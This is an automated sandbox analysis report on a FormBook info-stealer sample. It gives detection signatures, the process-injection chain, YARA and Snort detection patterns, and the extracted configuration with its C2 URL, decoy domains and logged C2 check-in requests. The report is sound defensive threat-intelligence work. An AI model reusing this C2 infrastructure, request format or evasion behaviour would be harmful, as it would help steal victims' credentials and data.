Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report KY4cmAI0jU.exe

Overview

General Information

Sample Name:KY4cmAI0jU.exe
Analysis ID:433078
MD5:8c35ac8d43f7e59105902fa16114144e
SHA1:c1a0e5de1121e55c22649182c923b41efd4e2848
SHA256:1a08fc838c4ebab6b986b6010e2074a05c29916cd38096e7f7d26a6455917508
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • KY4cmAI0jU.exe (PID: 2128 cmdline: 'C:\Users\user\Desktop\KY4cmAI0jU.exe' MD5: 8C35AC8D43F7E59105902FA16114144E)
    • KY4cmAI0jU.exe (PID: 1632 cmdline: 'C:\Users\user\Desktop\KY4cmAI0jU.exe' MD5: 8C35AC8D43F7E59105902FA16114144E)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • help.exe (PID: 5448 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
          • cmd.exe (PID: 5380 cmdline: /c del 'C:\Users\user\Desktop\KY4cmAI0jU.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.alberthospice.com/sh2m/"], "decoy": ["ladorreguita.com", "starflexacademy.com", "aumhouseholds.com", "ylcht.info", "skill-seminar.com", "insurancedowntown.com", "baliholisticacademy.com", "andrealuz.com", "choicecarloans.com", "ezonkorea.com", "charteroaktech.com", "acpcomponents.com", "portugalthecoder.com", "ipoolhub.com", "webfwrd.com", "swiggy.company", "covidproofevents.com", "jianhufeiyang.space", "oohvd-amai.xyz", "directprnews.com", "kfrx-assuv.xyz", "take-me-bergen.com", "audiosech.club", "infinitytradingapp.com", "pujajaiswal.com", "slateradvertising.com", "tensefit.com", "beyou.fitness", "maybowser.com", "thenewrepublican.net", "kenms.com", "rjpadvisors.com", "pridebiking.com", "99kweeclub.com", "wakarasu.com", "millabg.com", "beenovus.com", "gregcasarsocialist.com", "rentmystuff.info", "adultvideolife.xyz", "ytjee4x6zm9wg.net", "dbsjsa.net", "ziduh.com", "track-website.website", "societalfusion.com", "in-homenannies.com", "sudhakarfurniture.com", "services-nz.com", "obi4ex.com", "geniepinie.com", "dilossearticle.com", "changecamps.com", "meganfantastic.com", "jaisl11.com", "sciencebasedmasks.com", "candydulce.com", "tetra-oil.com", "mkpricephoto.com", "hayvankayit.com", "ellasween.com", "gracelandofkrotzsprings.com", "dndemystified.com", "blinbins.com", "lolasvibe.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.KY4cmAI0jU.exe.2170000.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.KY4cmAI0jU.exe.2170000.3.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.KY4cmAI0jU.exe.2170000.3.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158c9:$sqlite3step: 68 34 1C 7B E1
        • 0x159dc:$sqlite3step: 68 34 1C 7B E1
        • 0x158f8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
        • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
        1.1.KY4cmAI0jU.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.1.KY4cmAI0jU.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.alberthospice.com/sh2m/"], "decoy": ["ladorreguita.com", "starflexacademy.com", "aumhouseholds.com", "ylcht.info", "skill-seminar.com", "insurancedowntown.com", "baliholisticacademy.com", "andrealuz.com", "choicecarloans.com", "ezonkorea.com", "charteroaktech.com", "acpcomponents.com", "portugalthecoder.com", "ipoolhub.com", "webfwrd.com", "swiggy.company", "covidproofevents.com", "jianhufeiyang.space", "oohvd-amai.xyz", "directprnews.com", "kfrx-assuv.xyz", "take-me-bergen.com", "audiosech.club", "infinitytradingapp.com", "pujajaiswal.com", "slateradvertising.com", "tensefit.com", "beyou.fitness", "maybowser.com", "thenewrepublican.net", "kenms.com", "rjpadvisors.com", "pridebiking.com", "99kweeclub.com", "wakarasu.com", "millabg.com", "beenovus.com", "gregcasarsocialist.com", "rentmystuff.info", "adultvideolife.xyz", "ytjee4x6zm9wg.net", "dbsjsa.net", "ziduh.com", "track-website.website", "societalfusion.com", "in-homenannies.com", "sudhakarfurniture.com", "services-nz.com", "obi4ex.com", "geniepinie.com", "dilossearticle.com", "changecamps.com", "meganfantastic.com", "jaisl11.com", "sciencebasedmasks.com", "candydulce.com", "tetra-oil.com", "mkpricephoto.com", "hayvankayit.com", "ellasween.com", "gracelandofkrotzsprings.com", "dndemystified.com", "blinbins.com", "lolasvibe.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: KY4cmAI0jU.exeVirustotal: Detection: 34%Perma Link
          Source: KY4cmAI0jU.exeMetadefender: Detection: 17%Perma Link
          Source: KY4cmAI0jU.exeReversingLabs: Detection: 41%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: KY4cmAI0jU.exeJoe Sandbox ML: detected
          Source: 6.2.help.exe.3407960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.KY4cmAI0jU.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.KY4cmAI0jU.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.help.exe.9fd7e8.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: KY4cmAI0jU.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: KY4cmAI0jU.exe, 00000000.00000003.213745090.00000000099C0000.00000004.00000001.sdmp, KY4cmAI0jU.exe, 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, help.exe, 00000006.00000002.481376973.0000000002FEF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: KY4cmAI0jU.exe, help.exe
          Source: Binary string: help.pdbGCTL source: KY4cmAI0jU.exe, 00000001.00000002.266136705.0000000000A40000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: KY4cmAI0jU.exe, 00000001.00000002.266136705.0000000000A40000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_0040263E FindFirstFileA,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49730 -> 172.67.206.33:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49730 -> 172.67.206.33:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49730 -> 172.67.206.33:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 104.21.89.72:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 104.21.89.72:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 104.21.89.72:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 3.34.12.41:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 3.34.12.41:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 3.34.12.41:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.alberthospice.com/sh2m/
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=Y4nA7D8ZanudJV/n7ckHSBWOhW22WEJR/asQiGNTmjaNDyrYZ8Q/zKqiBMBjk5weHegN&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.take-me-bergen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=CQ6AMTNmXrT6GsHyvLqygrxreupfdtmN+4T1XtvAXMgditzRj6Y1Xuw537ryrSqhWitY&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.starflexacademy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=AN9Dli3eSwBxhLN7Z92H8FzDOGpUzm7G3BkkvfgYwC6zoN6kwH9F+lw53Jt7Bui6OWXD&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.ladorreguita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=Qqwfsv61LD8gOSv2HQNs13/ILT3hkPAGuV1QQZOHa/kG/rdN/rA5QVkGcwq5olxFBDS9&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.candydulce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=c9aUCvLa9Ql2a6xFKe5xJWdXulTfAnmJmW0relGKzVi+CMwVFA49Zy8Fshmf8yObHaZC&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.insurancedowntown.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=UiVwUNrNLQfwtohPmVYH70t5lUixURpqlrLqHTUDsyREBVD/9Tpqi3FDGPs9lJ3zNa3b&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.ezonkorea.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=e+6U2v/464/49Vrt/4yGVwpDKMjmMUzpCV508o5/z2Kz7+x90JHivdh29zvGxsTtrzAO&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.dndemystified.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=uHvpiI6aXo2y2Po+6svR0qIfr0jRx6IK9412etvelJearRBAFXnPloN9l4KAKLF+tazG&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.meganfantastic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 3.143.65.214 3.143.65.214
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=Y4nA7D8ZanudJV/n7ckHSBWOhW22WEJR/asQiGNTmjaNDyrYZ8Q/zKqiBMBjk5weHegN&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.take-me-bergen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=CQ6AMTNmXrT6GsHyvLqygrxreupfdtmN+4T1XtvAXMgditzRj6Y1Xuw537ryrSqhWitY&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.starflexacademy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=AN9Dli3eSwBxhLN7Z92H8FzDOGpUzm7G3BkkvfgYwC6zoN6kwH9F+lw53Jt7Bui6OWXD&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.ladorreguita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=Qqwfsv61LD8gOSv2HQNs13/ILT3hkPAGuV1QQZOHa/kG/rdN/rA5QVkGcwq5olxFBDS9&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.candydulce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=c9aUCvLa9Ql2a6xFKe5xJWdXulTfAnmJmW0relGKzVi+CMwVFA49Zy8Fshmf8yObHaZC&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.insurancedowntown.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=UiVwUNrNLQfwtohPmVYH70t5lUixURpqlrLqHTUDsyREBVD/9Tpqi3FDGPs9lJ3zNa3b&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.ezonkorea.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=e+6U2v/464/49Vrt/4yGVwpDKMjmMUzpCV508o5/z2Kz7+x90JHivdh29zvGxsTtrzAO&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.dndemystified.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=uHvpiI6aXo2y2Po+6svR0qIfr0jRx6IK9412etvelJearRBAFXnPloN9l4KAKLF+tazG&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.meganfantastic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.take-me-bergen.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Jun 2021 07:03:07 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
          Source: explorer.exe, 00000002.00000000.235645842.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: KY4cmAI0jU.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: KY4cmAI0jU.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: help.exe, 00000006.00000002.482952749.0000000003582000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
          Source: help.exe, 00000006.00000002.482952749.0000000003582000.00000004.00000001.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
          Source: help.exe, 00000006.00000002.482952749.0000000003582000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORY
